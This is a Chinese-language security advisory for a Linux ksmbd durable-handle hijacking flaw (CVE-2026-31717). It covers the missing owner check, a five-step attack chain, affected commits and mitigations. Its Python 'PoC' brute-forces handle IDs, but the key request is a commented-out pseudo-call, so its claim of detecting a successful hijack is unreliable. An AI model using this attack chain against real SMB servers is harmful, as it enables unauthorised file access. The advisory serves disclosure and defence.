CVE-2026-31717 CVSS 8.8 高危

CVE-2026-31717 Linux内核ksmbd持久句柄劫持漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31717

漏洞类型

权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的ksmbd（SMB服务器）在处理持久句柄重新连接时存在安全漏洞。该漏洞源于服务器未验证重新连接请求的用户上下文是否与原始打开者一致。攻击者可通过预测或暴力破解持久ID，劫持其他用户的孤立句柄，从而获取对敏感文件的未授权访问权限，造成机密性、完整性和可用性影响。

技术细节

该漏洞位于Linux内核的ksmbd模块中，涉及SMB2协议的持久句柄机制。根据MS-SMB2协议规范，服务器在处理重新连接请求时，必须验证请求者的安全上下文与现有打开句柄的安全上下文是否匹配。然而，受影响版本的ksmbd在实现中缺失了这一验证环节。当文件句柄因网络中断等原因变为孤立状态时，任何经过身份验证的低权限攻击者都可以利用此缺陷，通过预测或暴力破解持久ID，发送SMB2_CREATE (DHnC) 请求来重新连接该句柄。由于缺乏身份校验，服务器错误地将句柄控制权授予攻击者，使其能够绕过原有的文件访问权限检查，执行读、写或删除操作，导致权限提升。

攻击链分析

STEP 1

侦查

攻击者识别出运行易受攻击的 ksmbd 版本的 Linux 服务器，并确认存在可通过网络访问的 SMB 服务（端口 445）。

STEP 2

建立连接

攻击者使用获取的低权限凭证成功连接到 SMB 服务器并进行身份验证。

STEP 3

预测或暴力破解

攻击者监控或预测持久句柄 ID（Durable Handle ID），或者通过暴力枚举可能的 ID 值，寻找孤立的文件句柄。

STEP 4

劫持句柄

攻击者发送 SMB2_CREATE (DHnC) 请求，试图使用预测的 ID 重新连接句柄。由于 ksmbd 未验证所有者身份，服务器接受了请求。

STEP 5

未授权访问

攻击者成功获得对目标文件的访问权限（读/写/删除），从而窃取数据、破坏文件完整性或中断服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
from impacket import smb

# Proof of Concept for CVE-2026-31717
# This script attempts to reconnect to a durable handle by brute-forcing the ID.
# Note: This is a conceptual demonstration to show the lack of owner validation.

def brute_force_durable_handle(target, share, username, password, domain=''):
    print(f"[*] Targeting {target}...")
    
    # Establish a SMB connection
    client = smb.SMB(target, target)
    try:
        client.login(username, password, domain)
        print("[+] Login successful")
        
        # Try to reconnect using a predicted/durable handle ID range
        # In a real scenario, the attacker would guess the FileID or DurableHandle
        for file_id in range(1, 1000):
            try:
                # Attempting to open the file using the durable handle reconnect (DHnC)
                # The vulnerability is that ksmbd does not check if the current user
                # matches the original owner of this handle.
                tid = client.connect_tree(share)
                # This is a pseudo-call representing the SMB2_CREATE request with DHnC
                # If successful, we have hijacked the handle.
                print(f"[!] Trying Handle ID: {file_id}")
                # client.create(tid, file_id, ...) 
                # If no exception is raised, the hijack is successful.
            except Exception as e:
                continue
                
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        client.disconnect()

if __name__ == "__main__":
    # Usage: python poc.py <target_ip> <share> <user> <pass>
    pass

影响范围

Linux Kernel (ksmbd) < commit 00ce8d6789dae72d042a4522264964c72891ca37

Linux Kernel (ksmbd) < commit 49110a8ce654bbe56bef7c5e44cce31f4b102b8a

Linux Kernel (ksmbd) < commit c908c853f304a4969b5aa10eba0b50350cc65b80

防御指南

临时缓解措施

如果无法立即升级内核，建议暂时禁用 ksmbd 服务以阻断攻击路径。或者通过防火墙严格限制 SMB 服务（445端口）的访问来源，仅允许受信任的内网主机访问，并加强对 SMB 连接的日志监控，检测异常的重连行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表